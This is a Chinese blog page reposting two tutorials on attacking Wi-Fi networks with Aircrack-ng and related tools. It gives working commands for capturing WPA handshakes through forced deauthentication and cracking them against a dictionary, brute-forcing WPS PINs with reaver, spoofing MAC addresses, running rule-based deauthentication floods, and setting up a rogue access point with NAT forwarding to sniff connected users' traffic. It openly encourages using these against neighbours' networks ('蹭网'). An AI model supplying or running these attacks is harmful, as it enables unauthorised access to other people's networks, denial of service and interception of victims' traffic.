Aircrack的简单使用

来源:互联网 发布:数据库用什么软件好 编辑:程序博客网 时间:2024/06/10 19:41


暴力破解法
何为暴力破解呢,其实就是一个一个密码试,直到正确的密码为止。
现在的wifi一般加密都是:
1、不启用安全‍‍‍‍2、WEP‍‍‍‍
3、WPA/WPA2-PSK(预共享密钥)‍‍‍‍
4、WPA/WPA2 802.1X (radius认证)
进入正题:
第一步:
进入kali启动终端输入如下:
root@kali:~# airmon-ng
看看网卡信息
利用kali破解wifi密码全过程-安全盒子
第二步:
输入:
airmon-ng start wlan0
监听窗口
利用kali破解wifi密码全过程-安全盒子
第三步:
输入:
airodump-ng mon0
扫描wifi信号
利用kali破解wifi密码全过程-安全盒子这里我用自己家wifi做实验
第四步:
这是我家wifi:
上图可以看出
BSSID是00:0F:32:A0:99:DC     信道(CH)是:1
输入:
airodump-ng -w freedom -c CH --bssid 00:0F:32:A0:99:DC mon0 --ignore-negative-one
解释:CH表示信道,信道是多少就填多少,freedom是一会抓握手包的文件名字,他会自动生成一个freedom.cap的文件,这个名字随便你们填什么
利用kali破解wifi密码全过程-安全盒子
利用kali破解wifi密码全过程-安全盒子
00:0F:32:A0:99:DC  64:5A:04:BB:54:57   -4    0e- 0e     0      400  
00:0F:32:A0:99:DC 这个是路由器的mac

64:5A:04:BB:54:57 这个是客户端的mac
第五步:
重新开一个客户端输入命令:
aireplay-ng --deaut 10 -a 00:0F:32:A0:99:DC -c 64:5A:04:BB:54:57 mon0 --ignore-negative-one
利用kali破解wifi密码全过程-安全盒子
掉线了,当我们重新连接抓到握手包
利用kali破解wifi密码全过程-安全盒子
第六步:
破解握手包:
利用kali破解wifi密码全过程-安全盒子
命令如下:
aircrack-ng -w mi freedom-*.cap
解释:mi字典名字      freedom-*.cap
利用kali破解wifi密码全过程-安全盒子
abc123abc这个就是我的wifi密码
利用kali破解wifi密码全过程-安全盒子
破解完成,成功与否靠强大的字典和运气了,希望各位亲们蹭网愉快!!!
通过pin码破解
这个方法很简单:
第一步:Wash 扫描开启WPS的网络。
wash -i mon1 –C
利用kali破解wifi密码全过程-安全盒子
小编的周围没有开启wps功能我wifi,就会出现上图那样,这样咋办呢
不要急,因为有些隐藏了起来,我们直接霸王硬上弓
用前面那个扫wifi的命令:
airodump-ng mon0
利用kali破解wifi密码全过程-安全盒子
看见小编圈起来的mac没有,选择一个PWR的值的绝对值小于70的wifi破解
第二步:
我在这选择的是名字为:FAST_F70E的wifi
就他了:E4:D3:32:7F:F7:0E  -45        2        0    0   6  54e. WPA2 CCMP   PSK  FAST_F70E
然后命令如下:
reaver -i mon0 -b E4:D3:32:7F:F7:0E -a -S -vv
E4:D3:32:7F:F7:0E 这个mac根据路由器的mac更改,我破解的wifi的mac是E4:D3:32:7F:F7:0E
利用kali破解wifi密码全过程-安全盒子
如图上表示可以破解,开启了wps功能
利用kali破解wifi密码全过程-安全盒子
出现上图这样,就表示不能破解换其他wifi破解吧孩子
利用kali破解wifi密码全过程-安全盒子
这样就表示破解出来了
小知识:
如果密码被改了你知道他wifi的pin码就用如下命令:reaver-i mon0 -b MAC -p PIN
pin码有8位:所以就是10的8次方,要穷举1000000000次
这样pin也是有限制的,比如要被pin出的路由器必须得开启wps功能;貌似现在很多都是防pin路由器或300秒pin限制的。

有些路由pin码可以通过计算得到:腾达和磊科的产品如果路由MAC地址是以“C83A35”或“00B00C”打头那么可以直接计算出PIN值。
比如这个:bssid :Tenda_579A18    mac :C8:3A:35:57:9A:18  通过计算器将mac后6位换算成10进制数,得到5741080(pin码的前7位),最多试10次或通过软件得到该路由pin码!

破解时推荐这个命令:
reaver -i mon0 -b E4:D3:32:7F:F7:0E -a -S –d9 –t9 -vv
因为–d9 –t9参数可以防止pin死路由器。


原文:www.secbox.cn/hacker/wireless/4877.html

Aircrack的其他玩法

Aircrack这种屌爆了的攻击测试套件在网上居然只有用它破解WiFi密码的教程,在这里我来扒个冷门,介绍下这款杀器的其他一些有趣的玩法。

0×00:首先你需要一张usb无线网卡

ifconfig查看可以正常识别,如果不行看这里。

0×01:干坏或者不坏的事情前先修改MAC

ifconfig [INTERFACE] down#关闭网卡

#[INTERFACE]是指你的无线网卡,一般为wlan0,下不再说明

macchanger -m [MAC] [INTERFACE]#修改MAC,[MAC]是你要改为的MAC地址,后面是你的网卡

#可以macchanger –help查看帮助信息

ifconfig [INTERFACE] up#打开网卡

0×02:把无线网卡切换到监听模式

#首先ifconfig可以看见有无线网卡然后

ifconfig wlan0 down #wlan0可能需要更换为你的网卡,一般默认都为wlan0airmon-ng #查看当前网卡情况airmon-ng start wlan0airmon-ng #查看是否打开成功ifconfig wlan0 up

iwconfig mon0  #查看Mode是不是Monitor(监听模式)

停止的命令:

airmon-ng stop mon0

0×03:获取/保存当前环境的WiFi信息

airodump-ng mon0 #收集wifi范围内的所有无线信息,Ctrl+c停止

#BSSID是mac地址,PWR是信号强度,后面是收集到的数据量,CH是信道,再后面是加密方式和ESSID

#见下图

#语法:airodump-ng –channel [x] –bssid [bssid] –write [filename] [interface?mon0]

#在我的环境下,命令如下

airodump-ng --channel 11 --bssid 24:05:0F:22:EF:82 --write babylove mon0

#将会把文件保存在当前目录下,一filename-01命名的三个文件,可以不加–write和参数,将不保存

0×04:初级断网攻击

#也就是传说的Deauthentication攻击

airodump-ng --channel 11 --bssid 24:05:0F:22:EF:82 mon0#查看当前环境的WiFi连接情况
aireplay-ng --deauth 10000 -24:05:0F:22:EF:82 -84:A6:C8:77:FF:F6 mon0 #对目标实现攻击

#见下图

#根据需要可以添加参数-e 11 –ignore-negative-one

#指定信道,忽略错误

#见下图

0×05:高级断网攻击

#可以自定义一个规则文件,是这个规则下的目标无法连接到WiFi网络,首先确保你的Aircrack套件中包含airdrop-ng,如下图测试:

#创建一个文件,airdeo-rules.txt,

#简单说来这个文件只保存三个参数,第一个参数a或者d,表示可以连接或者拒绝第三个参数所表示的客户机连接到第二个参数所表示的AP;

#第一个和第二个参数用/连接;

#第二个参数是AP的MAC地址,可以使any就是我们无线网卡所能监测到的所有热点;

#第二个和第三个参数用|链接;

#第三个参数是客户机的MAC地址,可以使any或者是Apple, Inc;APPLE COMPUTER;APPLE COMPUTER, INC.;Apple Computer Inc.;APPLE COMPUTER INC.;APPLE, INC等,来是的这些客户允许或者拒绝链接AP。

#创建好文件后保存在当前目录下,就是收集到的信息保存的目录中,一般为home中。

airodump-ng --write airdrop-test-file --output-format csv mon0

#收集到足够多的信息后ctrl+c

#airodump-ng 攻击并将数据保存在airdrop-test-file-01.csv的文件里

airdrop-ng -t airdrop-test-file-01.csv -r airdeo-rules.txt -i mon0

#使用airdrop攻击,调用前面收集到的信息文件,使用刚才穿件的rules规则和mon0网卡攻击。

0×06:最叼叼的部分,虚假AP/MITM攻击

#安装简单的dns服务

apt-get install dnsmasq

#确认有/etc/dnsmasq.conf,并如下写入服务规则

echo -"interface=at0\ndhcp-range=192.168.0.50,192.168.0.150,12h" > /etc/dnsmqsq.conf

#开启AP语法:airbase-ng -e [network name] -c [channel] [interface]

airbase-ng -e fake-ap -6 mon0

现在应该就已经可以搜到虚假ap了,不过还连接不上。

新开启一个终端:

ifconfig at0 192.168.0.1 up

#设置iptables的转发规则

iptables --flushiptables --table nat --flushiptables --delete-chainiptables --table nat --delete-chainiptables -P FORWARD ACCEPT

#把虚假AP的无线网卡和我们正常上网的网卡关联,是连接到虚假AP的人可以上网

iptables -t nat -A POSTROUTING -[internet interface] -j MASQUERADEiptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

#开启dns服务

dnsmasqecho "1" > /proc/sys/net/ipv4/ip_forward

#如果出现Got channel -1, expected a value > 0.错误,执行:

#ifconfig wlan0 down

#也就是关掉用来开启嗅探模式的那个网卡就行

#在新的终端里执行完命令后其他终端就可以连接上虚假AP了,如下图

#然后打开Wireshark开始抓吧(注意选择at0或者你指定的哪个虚假AP的网卡),所有流量都是通过你的虚假AP走的,如下图.

还不是想抓什么抓什么,玩玩中间人不也很好~


原文:http://www.freebuf.com/articles/wireless/59809.html


1 0
原创粉丝点击